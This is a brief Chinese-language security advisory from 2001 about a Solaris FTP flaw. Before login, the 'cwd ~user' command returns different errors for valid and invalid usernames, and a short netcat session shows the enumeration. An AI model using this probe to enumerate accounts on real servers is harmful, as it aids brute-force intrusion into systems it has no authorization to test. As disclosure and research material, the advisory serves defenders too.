SOLARIS　FTP　泄露用户信息漏洞

SOLARIS　FTP　泄露用户信息漏洞
来源:本文出自: 中国红客联盟 http://www.cnhonker.com (2001-06-01 08:10:00)

涉及程序： FTP 描述：利用 Solaris FTP 漏洞暴力破解远程系统用户信息详细：近日发现 Solaris FTP 存在一个暴露用户信息漏洞。攻击者通过提交命令能暴力破解远程系统上的用户信息。以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负 C:\>nc 10.64.224.3 21 220 gsmms0 FTP server (SunOS 5.6) ready. cwd ~netadm 530 Please login with USER and PASS. cwd ~xyz 530 Please login with USER and PASS. 550 Unknown user name after ~ 可以看出，cwd ~netadm 产生了 530 信息而后退出了。 xyz用户产生 550 信息：Unknown user name after ~ 这能被用来暴力破解远程系统上的用户信息。受影响系统： SOLARIS 5.6, 5.7 ,8（sparc ) (http://www.fanqiang.com)

相关文章


★ 感谢所有的作者为我们学习技术知识提供了一条捷径 ★ www.fanqiang.com